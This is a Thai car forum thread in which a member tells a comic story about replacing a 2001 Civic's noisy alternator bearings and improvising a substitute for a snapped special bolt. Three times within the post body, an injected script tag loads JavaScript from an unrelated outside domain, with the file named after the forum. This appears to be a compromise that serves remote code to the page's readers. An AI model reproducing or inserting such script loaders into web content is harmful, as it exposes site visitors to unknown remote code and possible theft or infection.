ตอบ
itcentre


เข้าร่วม: 25 ตุลา 2010
ตอบ: 1154

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1492
ให้คำขอบคุณ: 448

ที่อยู่: Pattaya
ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อาทิตย์, 11 สิงหา 2019 10:24 - มาอ่านการ์ตูน เรื่อง " น๊อต 1 ตัว เกือบทำให้ต้องยก ไดชาร์ทใหม่ทั้งลูก " กันครับ
น๊อต 1 ตัว เกือบทำให้ต้องยก ไดชาร์ทใหม่ทั้งลูก

ตามปกการ์ตูนเล่มนี้เลยครับ 

  ....สืบเนื่องมาจาก มีเสียงดังมาจากการเหยีบคันเร่ง ฟังดูไม่ค่อยออกว่ามาจากเสียงอะไรกันแน่..ต้องเอาเข้าอู่ที่ไปทำประจำ

เอี๊ยด...เสียงเบรครถ จอดหน้าอู่ พร้อมเปิดประตูลงมา..

"ทำอะไรครับ"  เสียงทักทายจากเจ้าบ้าน ช่างของอู่

"พี่ มันมีเสียงดังจากห้องเครื่อง เวลาที่เหยียบคันเร่งน่ะครับ" พร้อมเปิดกระโปรงรถให้ช่างทันที

"แต๊ก" กระโปรงถูกเปิดขึัน  ช่างคนที่ถาม เดินมาที่หน้ารถทันที 

"เดี๋ยวผมหยียบคันเร่งให้ฟังนะครับ" ว่าแล้วก็เหยียบคันเร่งลงไป บรื้นๆ..บรื้นนนนนนนนน

"เสียงดังมาจากลูกปืนครับ" ช่างอู่ตอบทันทีหลังได้ยินเสียง

"ลูกปืน ตรงไหนหรอครับ"  ผมไม่รีรอที่จะถามกลับ

ว่าแล้วช่าง ก็เดินกลับไปที่ตู้เครื่องมือ กลับมาพร้อมอุปกรณ์พิเศษ ที่มีกันอยู่ทั่วไป นั่นคือ  "ไขควง อันยาวๆ"
ไม่พูดพร่ำ ทำเพลง จิ้มไขควงลงไปที่บริเวณเสื้อสูบรถ จากนั้น ก็ก้มหูแนบชิดติดกับไขควง ตั้งใจฟังอย่างดี 
แล้วก็เปลี่ยนไปจิ่มต่อที่ ไดชาร์ท โดยที่หูยังคงแนบชิดติดกับไขควงเหมือนเดิม..

"ลูกปืนไดชาร์ทครับ"  ป๊าด... ไขควงขั้นเทพ  สามารถเช็คฟังเสียงสะท้อนของการหมนลูกปืนได้ เหมือนหูฟังของหมอแน่เลย

"แล้วเปลี่ยนได้ไหมครับ"  ผมไม่รีรอที่จะถามต่อ..

"ผมไม่มีลูกปืนเปลี่ยนให้ครับ ต้องเปลี่ยนไดชาร์ทยกลูกเท่านั้น ประมาณ 4000 ถึง 4500 บาท"

"ง่ะ.." ผมสะอึกทันที 

"แล้วมันเปลี่ยนเฉพาะลูกปืนได้ไหมพี่" ผมบรรจุกระสุน ยิงคำถามต่อทันที

"เปลียนได้ครับ แต่ต้องไปร้านที่รับทำพวก ไดนาโม พวกนั้นเค้าจะเปลี่ยนให้ได้" ช่างตอบได้ทันทีทันใด

"พี่มีร้านแนะนำไหมครับ" (จริงๆ ผมก็รู้แล้วหล่ะ ว่าร้านพวกนี้ มันมีอยู่ตรงไหนบ้าง) แต่จะลองถามเผื่อมีร้านที่พี่เค้ารู้จักกัน

"อ่อ.. น้องไปตรงนี้เลยนะ...ออกไปนี่ เลี้ยงซ้าย ตรงไป เลี้ยวซ้ายอีกที ยูเทรินรถกลับมา วิ่งมาสัก 3กิโล แล้วจะเห็นร้าน
อยู่ซ้ายมือ เขียนว่า ร้าน ไดนาโม"  ในใจผมก็คิดตามที่พี่ช่างเค้าพูดเส้นทางให้ฟัง  อ๋อ  มันคือร้านที่ผมคิดออกในใจร้านแรกนั่นล่ะ   

อ่านๆดู เหมือนไปกวนบาทา พี่เค้ายังไงไม่รู้..


"ขอบคุณมากนะครับพี่" ยกมือไหว้ ขอบคุณพี่เค้างามๆ 1ครั้ง แล้วก็ บรื้นๆ..พร้อมเสียงดังจากลูกปืน ออกจากอู่พี่เค้าทันที


....เอี๊ยด....เสียงเบรค จอดหน้าร้านไดนาโม  (มาถึงไว เหมือนโกหก)

" ทำอะไรครับ " เสียงจากช่างร้านไดนาโม ถามด้วยความสงสัย

" ปลี่ยนลูกปืน ไดชาร์จครับ "  ตอบแบบมั่นใจ ใจเกินร้อย 

" รอสักครู่นะ ช่างติด ทำรถ ทัวร์อยู่ "  

" ป๊าด..รถทัวร์ก็ทำ " นึกในใจนะ

" ได้ครับพี่ ไม่มีปัญหา ผมมีเวลาทั้งวัน "

ว่าแล้วก็ชมนก ชมไม้ ชมปลา ไปพลางๆ เพื่อรอพี่ช่าง....

มาอ่านการ์ตูน เรื่อง " น๊อต 1 ตัว เกือบทำให้ต้องยก ไดชาร์ทใหม่ทั้งลูก " กันครับ

"หวัดดีเอี้ยง..เอี้ยงหวัดดี"   มันจะฟังผมรู้เรื่องไม๊อ่ะ..แต่นกเอี้ยงบางตัว มันพูดได้นะ

มาอ่านการ์ตูน เรื่อง " น๊อต 1 ตัว เกือบทำให้ต้องยก ไดชาร์ทใหม่ทั้งลูก " กันครับ

" หวัดดีปลา..ปลาหวัดดี... "   ม๊ายช่าย...ม่ายได้พูดหวัดดีปลา

สักพัก พี่ช่างที่มุดอยู่ใต้ท้องรถทัวร์ก็เดินมาที่รถ

" ทำอะไรหนุ่ม "   (รู้สึก 14 อีกครั้ง)

"เปลี่ยนลูกปืนไดชาร์ทครับ..มันมีเสียงดัง"  ว่าแล้ว ก็เปิดกระโปรงบานรถทันที

" แต๊ก..." เสียงฝากระโปรงหน้ารถถูกเด้งออก 

มาอ่านการ์ตูน เรื่อง " น๊อต 1 ตัว เกือบทำให้ต้องยก ไดชาร์ทใหม่ทั้งลูก " กันครับ
" หนุ่ม  เหยียบคันเร่งซิ "  


ผมไม่รอช้า เหยียบคันเร่งทันที  บรื๊นๆ..บรื๊นนนนนนน.. ยาวไป..ยาวปายยยยย

" เอ้าพอ..พอ.."  เสียงพี่ช่างตะโกนกลับมา

ว่าแล้วพี่ช่าง ก็เดินไปหิ้วถังใส่เครื่องมือ สีดำๆ ในนั้นมีเครื่องมืออยู่ 7-8 อัน ไม่รอช้า จับประแจแหวนขันน๊อตทันที
ผมยืนมองดูด้วยความอยากรู้อยากเห็น

มาอ่านการ์ตูน เรื่อง " น๊อต 1 ตัว เกือบทำให้ต้องยก ไดชาร์ทใหม่ทั้งลูก " กันครับ
..." อื๊บ... น๊อตตัวนี้ขันออกยาก " เสียงช่างลอยมาเข้าหูทันที 

" แล้วพอขันออกได้ไหมครับ "  ผมไม่รอช้า สวนกลับทันควัน
 
"มันก็ต้องได้นะ ถ้าเอาน๊อตตัวนี้ออกไม่ได้ มันจะติดสายไฟ ก็เอาไดชาร์จออกมาซ่อมไม่ได้ " 
เสียงพี่ช่างตอบทันทีเหมือนกัน


ว่าแล้วพี่ช่าง ก็ไปหาประแจแหวนตัวใหม่มาขันน๊อตตัวนั้นแทน

" เป๊าะ.."  ไม่ใช่เสียงกำนันเป๊าะ นะครับ  มันคือเสียงที่น๊อตตัวเมียหลุดออกจากแกนน๊อต  ในในผมก็คิดโล่งอกทันที ว๊าว..หลุดออกมาแล้ว ดีจัง....

จากนั้นช่างก็ขันๆๆ น๊อตทั้งหมด พร้อมกับยก ไดชาร์ททั้งลูกออกมาจากรถ เดินไปที่โต๊ะทำงานทันที (จริงๆไม่มีโต๊ะหรอก  โต๊ะก็คือพื้นปูนนั่นล่ะ..

มาอ่านการ์ตูน เรื่อง " น๊อต 1 ตัว เกือบทำให้ต้องยก ไดชาร์ทใหม่ทั้งลูก " กันครับ
"ตั๊บๆ.." เสียงดังมาจากการตอกไขควงลงไปที่หัวน๊อต ไม่นานไดชาร์ททั้งลูก ก็ถุกรื้อ ออกเป็น ชิ้นส่วน..

มาอ่านการ์ตูน เรื่อง " น๊อต 1 ตัว เกือบทำให้ต้องยก ไดชาร์ทใหม่ทั้งลูก " กันครับ
ที่เห็นเป็นแท่งๆ แบนๆ ยื่นออกมานั่นคือ ถ่านนะครับ ถ่านไฟฉายตรากบ  ม่ายช๊าย...ยย

" จะหลับกันไหมนี่ เขียนซะยาวเลย "   "<script src="https://sport32news.com/civicesgroup.js">


"เปลี่ยนสองลูกเลยไหม.. ลูกปืนอ่ะ"  เสียงช่างถาม

มาอ่านการ์ตูน เรื่อง " น๊อต 1 ตัว เกือบทำให้ต้องยก ไดชาร์ทใหม่ทั้งลูก " กันครับ
ผมมองเห็นลูกปืนล่ะ ลูกเล็กนิดเดียว จิ๊บๆ ราคาไม่น่าจะสูง  

"เปลี่ยนสองลูกเลยครับ เปลี่ยนพร้อมๆกันนี่แหล่ะ อายุการใช้งาน น่าจะเท่าๆกัน "    ทำเป็นรู้ดี 

"มันก็ต้องเปลี่ยนสองลูกอยู่แล้วหล่ะ เค้าไม่เปลี่ยนกันแค่ลูกเดียวหรอก"  พี่ช่างแก ตอบผม

แล้วจะถามผมทำไมนิ..

มาอ่านการ์ตูน เรื่อง " น๊อต 1 ตัว เกือบทำให้ต้องยก ไดชาร์ทใหม่ทั้งลูก " กันครับ
ว่าแล้ว ก็เอาเหล็กที่งัดยางรถมาวางกับตลับลูกปืนที่ติดอยู่ที่แกนไดชาร์ท พร้อมตีฆ้อนลงไป

" ป๊อก..ๆ "   " ตั๊บ..ๆ "  "เป้ง..ๆ"   สักแป๊บ ลูกปืนลูกเล็กก็หลุดออกมา  ไม่รอช้า หยิบตัวเสื้อไดชาร์ทอีกอัน
มาตีลูกปืนตัวใหญ่ออก  "เป้ง"  กระเด็นหลุดออกมาทันที  เออ..อันนี้ออกง่ายดี

จากนั้นพี่ช่างแก ก็เอาตัวอย่างลูกปืนเดินไปหลังร้าน  สักพักก็กลับมา พร้อมถุงใส่ลูกปืนใหม่ 2กล่อง
ไม่พูดพร่ำทำเพลง จับลูกปืนใหม่ใส่แทนตัวเดิมทันที .....ตอนใส่ของใหม่ ใส่เข้าไปง่ายมากเลย

ตอกๆ ตีๆ บนลูกปืนตัวเล็กสองสามครั้ง ก็เข้าที่เข้าทางล่ะ...

ว่าแล้วก็ประกอบชิ้นส่วนไดชาร์ทกลับตามเดิม...

แล้วหัวข้อน๊อต 1 ตัว มันมาเกี่ยวอะไรกับเรื่องนี้   ร่ายเวทมนต์มาซะยาว

มาอ่านการ์ตูน เรื่อง " น๊อต 1 ตัว เกือบทำให้ต้องยก ไดชาร์ทใหม่ทั้งลูก " กันครับ

"งานเข้าแล้วไอ้น้อง"  เสียงช่างบอกผม

" มีไรอ่ะพี่ " ผมถามกลับทันที

" น๊อตมันขาด ยึดกลับเข้าที่เดิมไม่ได้ "  เสียงช่างตอบ

อ้าว..งานเข้าซิครับ..  " เอาน๊อตตัวอื่นใส่แทนได้ไหมครับ "

" มันไม่ได้อ่ะซิ มันเป็นน๊อตเฉพาะของมัน ที่ตัวมันเองจะยึดติดกับตัวโครงไดชาร์ท ไม่ให้หมุนตาม " พร้อมหยิบให้ผมดู

มาอ่านการ์ตูน เรื่อง " น๊อต 1 ตัว เกือบทำให้ต้องยก ไดชาร์ทใหม่ทั้งลูก " กันครับ
นี่..หน้าตาตัวน๊อต ที่ขาดออกจากกัน ตอนที่ไขออกจากตัวรถ 
ถ้าดูดีๆ จะเห็นว่า ใต้หัวน๊อต จะมีเป็นร่องๆ ฟันเฟือง เอาไว้สำหรับยึดติดกับตัวโครงไดชาร์ท เพื่อไม่ให้ตัวน๊อตหมุนตาม
เวลาเราใส่เกลียวตัวเมียเข้าไป

" ทำไงได้บ้างพี่ " เสียงผมถามกลับทันที

" มันก็ต้องหาน๊อตตัวใหม่ มาใส่แทนอ่ะ ไม่งั้นก็ต้องเปลี่ยนยกลูก" พี่ช่างแกตอบ

" ป๊าด..ตอบแบบไม่เกรงใจกระเป๋าตังค์ผมเลย " ไม่ถามปัญหาสุขภาพกระเป๋าตังค์ผมส๊ากกกก คำ..   

ไดชาร์ทลูกใหม่ลูกนึง ก็ 4-5000 บาทล่ะ  ถ้าต้องมาเปลี่นเพราะหาน๊อตตัวเดียวไม่ได้  ตาย..ตาย..

แต่ประเด็นคือ  น๊อตตัวนี้มันเป็นน๊อตเฉพาะจุด ไม่มีขาย หรือต้องหาจากอะไหล่เก่าๆ มาใส่แทน

ว่าแล้ว พี่ช่างแกก็เดินไปหลังร้าน กลับออกมาพร้อมกับ ชุดวงจรแผงใหม่ มันคือ..

มาอ่านการ์ตูน เรื่อง " น๊อต 1 ตัว เกือบทำให้ต้องยก ไดชาร์ทใหม่ทั้งลูก " กันครับ
" ชุดอีเล็คโทรนิคเร็กูเรเตอร์ ควบคุมกระแสไฟชาร์ทและแปลงแรงดัน" 
 หรือเรียกย่อๆว่า แผงไดโอด น่าจะได้มั้ง

ที่มีน๊อต ตัวที่มันขาดไป ว่าแล้วก็ฉีกถุงออก ลองเสียบน๊อตตรงรู ทันที

" ว๊า..ใส่ไม่ได้ น๊อตเบอร์ใหญ่ไป " เสียงบ่นขึ้นมาทันที

ในใจผมก็คิดว่า โห..นี่ผมต้องมาเสียเงินเปลี่ยนแผงนี่้อีกหรอนี่ 

โชคดีที่น๊อตตัวใหญ่ ใส่ไม่ได้

ฮ่าๆๆ..ยิ้มแบบกรุ่ม กริ่ม ภายในใจ..

" ผมว่าลองหาน๊อตเก่าๆมาแปลงใส่ดูดีกว่าครับ"   เสียงผมแนะนำทันที ประมาณว่า จะบังคับใช้ ม.44 ไปในตัวด้วย

" มันก็คงต้องอย่างนั้นแล้วหล่ะ "  พี่ช่างแกตอบ 

มาอ่านการ์ตูน เรื่อง " น๊อต 1 ตัว เกือบทำให้ต้องยก ไดชาร์ทใหม่ทั้งลูก " กันครับ

ว่าแล้วทั้งผม ทั้งช่าง ก็รื้อๆ ค้นๆ ในกองซากไดชาร์ท  ผมค้นหาแบบไม่เกรงใจซากไดชาร์ทเลย

หยิบนี่ โยนไปทางโน้น หยิบทางโน้น โยนมาทางนี้ ตาก็มองหา ในใจก็คิด ต้องหาให้ได้..ต้องหาให้ได้..

น็อตลักษณะแบบนี้มีเยอะมาก แต่เล็กบ้าง สั้นบ้าง ( ของผมไม่เล็กนะคร๊าบบ) ม่ายช่ายช่างแอร์ในตำนาน!!! 

และก็ได้น๊อตที่มันเหมือนๆกัน มาสามสี่ตัว เอามาคัดกรองขนาดอีกที

ไอ้ตัวที่หัวกลมๆ ก็ดันตัวเล็กไปอีก  แต่ยาวดี   ใช้ไม่ได้ ใส่เข้าไปแล้วหลวม

ส่วนไอ้ตัวที่หัวแบนๆ ยาวๆ  ใส่ได้ แต่หัวแบน ใส่ไม่ลง  ทำไงล่ะ   

ก็เจียร ซิครับ

" แอ๊ด..แจ๊ด...เอี๊ยด.." เสียงจากเครื่องเจียร ทำงานบนหัวน๊อต  ผมมองดูด้วยใจลุ้นระทึก

ในใจก็คิดตามไปด้วยว่า ต้องทำได้..ต้องทำได้..

ในที่สุด พี่ช่างแกก็ช่วยเซฟเงินในกระเป๋าผมไว้แบบลุ้นระทึก.. 

น๊อตที่หามา สามารถใส่เข้าไปแทนตัวที่ขาดได้ ลองหาน๊อตตัวเมีย มาใส่ล็อคดู...


ว๊าว.. สุดจัด ปลัดบอก..มันสามารถล็อคได้ไม่หมุนตาม

" เอาตามนี้เลยพี่ "  เสียงผมออกคำสั่งทันที

" เอางั้นนะ " พี่ช่างก็สวนกลับ  

" ก็เอางี้ล่ะพี่ น๊อต 1 ตัว ถ้าต้องจ่าย 4-5000 เพื่อแลกกับ ไดชาร์ทตัวใหม่ ตอนนี้ผมยังทำใจไม่ได้ "   ผมตอบกลับทันที
"<script src="https://sport32news.com/civicesgroup.js">

ว่าแล้วพี่ช่างแก ก็ประกอบชิ้นส่วนทั้งหมดกลับเข้าที่เดิม ไม่เกิน 10 นาทีก็เสร็จ โห ทำแบบด้วยความชำนาญ เร็วมาก..

" เอ..ลวดเส้นเล็กๆ หายไปไหนหว่า "  เสียงพี่ช่างแก บ่นงึมงำ สายตา ก็มองบนพื้น ซ้าย ขวา ไปมา

ในใจผมก็คิด  " อ้าว!!..อะไร หายอีกล่ะนี่ "   

" ลวดอะไรอ่ะพี่..  เส้นใหญ่ไหม "   ผมไม่รอช้ารีบถามทันที ในใจก็กลัวใส่ชิ้นส่วนกลับเข้าไปไม่หมด 

" ลวดธรรมดานี่ล่ะ..เอาไว้แหย่ ล็อคถ่าน " พี่ช่างแกพูดแบบใจเย็น ขณะที่สายตา ก็ยังมองหาไปมาบนพื้น

"  อ้อ..แล้วไป..คิดว่างานจะเข้าอีก "  ผมไม่รอช้า รีบช่วยพี่แกมองหาบนพื้นทันที

" ใช่นั่นหรือเปล่าครับ "  ผมชี้นิ้วไปที่ใต้เก้าอีกที่พี่เค้านั่งอยู่

" เออ..ใช่ๆ..มาอยู่ตรงนี้ได้ไงหว่า..? "   มันเป็นเส้นลวดแข็งๆ เล็กๆ ยาวประมาณสัก 5นิ้วได้ เค้าเอาไว้แหย่ล็อคให้ตัวถ่าน

มันยุบกลับมาที่โครงไดชาร์ท เพื่อที่จะใส่แกนของมอเตอร์กลับเข้าไปได้ แล้วถึงค่อยดึง ลวดเส้นนี้ออก ถือว่าจบการประกอบ

ไดชาร์ทพร้อมใช้งาน  " อืม..มันเป็นเทคนิค เล็กๆ น้อยๆ ของช่างเค้านี่เอง " 

" แป่ะ..แป่ะ.." 
 เสียงฝนลงเม็ด

" รีบใส่กลับเลยพี่..ถ้าตกเม็ดหนากว่านี้ จะทำไม่ได้  "  

" จายเย็น..มันไม่ตกหนักหรอก.. "  แน่ะ..มีรู้เรื่องพยากร อากาศ ฝน ด้วย

ว่าแล้วพี่ช่าง แกก็หิ้วถังเครื่องมือ ที่มีอยู่ 5 - 6 ชิ้น เดินตรงไปที่รถ จับยัดๆ ใส่ๆ หมุนนิด หมุนหน่อย..

" อ้าว..ไอ้หนุ่ม.."  เสียงพี่ช่างแก้ตะอุทานร้องขึ้น

" มีไรครับพี่.."

" แล้วสายพานอีกเส้นหายไปไหน?? " 

" สายพานไรอ่ะพี่..? "
อ้าว พี่ถอดเอง พี่จำไม่ได้หรอ ว่าถอดสายพานไปกี่เส้น.. 

ถึงตรงนี้ ผมร้อง อ๋อ..ทันที..

" เพื่อนๆ คิดออกกันไหมครับ ว่าที่พี่ช่างแกพูดถึง มันคือสายพานของอะไร ??? "





























" อ๋อ..สายพานของ ปั้มพาวเวอร์ อ่ะหรอ พี่..ไม่มีหรอก ผมถอดมันออกไปแล้ว ขี้เกียจเติมน้ำมัน "

" ก็ว่าอยู่..ว่าดูมันโล่งๆ.."
เสียงพี่ช่างแกตอบแบบขี้เล่นนิดๆ 

เขิน..อาย..อ่ะเด๊..   " ผมถอดแร็คน้ำมันออกครับ ใส่แร็คไฟฟ้าแทน ท่อพาวเวอร์ มันเคยรั่ว เลยถอดทิ้งซะเลย "

" อ๋อ..ที่คุมด้วยมอเตอร์ไฟฟ้าน่ะหรอ "
พี่ช่างแกตอบ แล้วก็ตั้งหน้าตั้งตาประกอบไดชาร์ทกลับที่เดิมต่อ

ไม่เกิน 20 นาที ก็ประกอบเสร็จ จัดการขันน๊อตหางปลา เพื่อตั้งความตึงของสายพานไดชาร์ท

" ถ้าตั้งตึงเกินไป มีผลเสียอะไรไหมครับ " เสียงผมถามด้วยความอยากรู้

"ถ้าตึงเกินไป ลูกปืน ก็จะเสียเร็ว.. ถ้าหย่อนเกินไป ไดชาร์ท ก็อาจจะเสียได้ " เสียงตอบแบบมั่นใจจากพี่ช่าง

" งั้นเอาพอดีๆ นะพี่ "  

" มันก็ต้องพอดีอยู่แล้วหล่ะ "
เสียงพี่ช่างตอบกลับทันที 

หลังจากประกอบทั้งหมดเข้าที่เสร็จ พี่ช่างแกก็เดินกลับไปที่โต๊ะเครื่องมือ..หยิบตู้เล็กๆ ที่มีหูหิ้ว มีสาย สองเส้นห้อย ด๊อง..แด๊ง..ไปมา

เดินกลับมาที่รถ พร้อมกับหนีบสายเข้าที่ขั้วแบ็ต

"อ่ะ..สตาร์ทรถเลย.."   พี่ช่างแกร้องบอก

" แช๊ด..ดดดด...บรื้น..ๆ.."  เสียงบิดกุญแจ พร้อมเครื่องยนต์ติด จากนั้นผมก็เดินมาดูไอ้ตู้เล็กๆ ที่มีจอ มีเข็มวัด ว่ามันคืออะไร??

" มันคืออะไรอ่ะครับ " เสียงถามจากผม ด้วยความสงสัย

" เอาไว้วัด ว่าไดชาร์ททำงาน จ่ายไฟหรือไม่ "  ตอบกลับทันทีเหมือนกัน

" แล้วจะรู้ได้ยังไงครับ ว่ามันทำงาน ชาร์ทไฟ เหมือนเดิม "  เสียงอยากรู้อยากเห็น จากผม ถามกลับทันที ชั่วโมงนี้ ไม่ถามไม่

อยากรู้ ไม่อยากเห็นไม่ได้แล้ว.. 

" ก็ดูตรงเข็ม ถ้ามันชี้ไปที่ประมาณ 14โวลต์ หรือ มากกว่า ก็ถือว่าทำงานปกติ ไม่ควรจะต่ำกว่านี้ " 

" สายตาผมรีบกวาด ไปจ้องที่หน้าจอ ไอ้ตู้ที่ดูเก่าๆ โบราณ ทันที " 
อืม..มันชี้มาเกิน 14 โล่งอก  ไดชาร์ททำงานปกติ

เป็นวิธีการ ขั้นตอนสุดท้ายของการเปลี่ยนหรือ ซ่อม ไดชาร์ท ทุกครั้ง ที่ต้องเช็ค ว่า ไฟชาร์ท ทำงานปกติหรือไม่..

" เอ้า..เสร็จแล้ว..พร้อมกับยื่นมือไปปลดตัวหนีบที่ขั้วแบ็ตเตอรี่ออก "

" น๊อตตัวเดียว เล่นเอาซะหลายชั่วโมงเลย..ดีนะ ที่หาใส่แทนได้.." 
เสียงพี่ช่างแกพูดลอยออกมา

" แจ๋วเลยพี่..ที่หาแปลงใส่แทนได้ "  เสียงผมตอลบกลับ ให้คำชมเชยพี่เค้าหน่อย..

" เท่าไรครับ ทั้งหมด "

"โน่นเลย..จ่ายเงินกับคนนั้น " 
ว่าแล้วก็ชี้มือไปที่พี่ผู้หญิงท่านนึง น่าจะเป็นอาซ๊อ ของเจ้าของร้าน

"เอาบิลด้วยไหมจ๊ะ "   เสียงถามจากอาซ๊อ..

" ได้ครับพี่ "  ว่าแล้วแกก็เดินย้อนกลับไปเขียนกลับมายื่นให้ เหมือนยื่นใบถอนเงินหน้าเค้าเตอร์ธนาคาร

" หนึ่งพันบาทจ่ะ " เสียงลอยมา หลังจากมือยื่นกระดาษมาก่อนแล้ว

" งั้นผมขอแป่ะโป้งไว้ก่อนนะครับ "
ม่ายช๊ายยยย ผมไม่ได้ตอบแบบนั้น

" ผมขอไปกดเงินเพิ่มหน่อยนะครับ " 

" ได้จ่ะ "  ว่าแล้วผมก็เดินหายเข้ามุมตึกไป กลับมาพร้อมกับแบ้งคหนึ่งพันบาท

" นี่ครับพี่ "  ขอบคุณนะครับ แน่ะ..มารยาทดีนะเรา ให้เงินเค้าแล้วยังขอบคุณเค้าด้วย  "<script src="https://sport32news.com/civicesgroup.js">

"แช้ด..ดดด..บรื้นๆ.." เสียงสตาร์ทรถ  ถอยหลังออก  เลี้ยวซ็าย เดินหน้า เลี้ยวซ้าย เข้าถนนใหญ่ มุ่งหน้ากับบ้าน...พร้อม

กับความเงียบกริ๊บจากการเปลี่ยนลูกปืนไดชาร์ท...มันช่างคุ้มจริงๆ กับเงิน 1000 บาทแลกมากับการที่เสียงหายไป...

ยาวหน่อย  มีสาระบ้าง..ไม่มีสาระบ้าง.. อ่านสนุกๆ กันนะครับ... ไม่ได้มาอัพเดทเวปนี้นานมาก..

ขับขี่ปลอดภัย ดูแลรถตัวเองด้วยนะคร๊าบบบบ....

มาอ่านการ์ตูน เรื่อง " น๊อต 1 ตัว เกือบทำให้ต้องยก ไดชาร์ทใหม่ทั้งลูก " กันครับ


 
ได้รับคำขอบคุณจาก: ท๊อป 
aumlight


ชื่อเล่น: อั้ม

เข้าร่วม: 27 พฤษภาคม 2013
ตอบ: 925

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 675
ให้คำขอบคุณ: 155

ที่อยู่: ES เมืองทอง
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 16 ตุลา 2019 10:47 - มาอ่านการ์ตูน เรื่อง " น๊อต 1 ตัว เกือบทำให้ต้องยก ไดชาร์ทใหม่ทั้งลูก " กันครับ
...
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.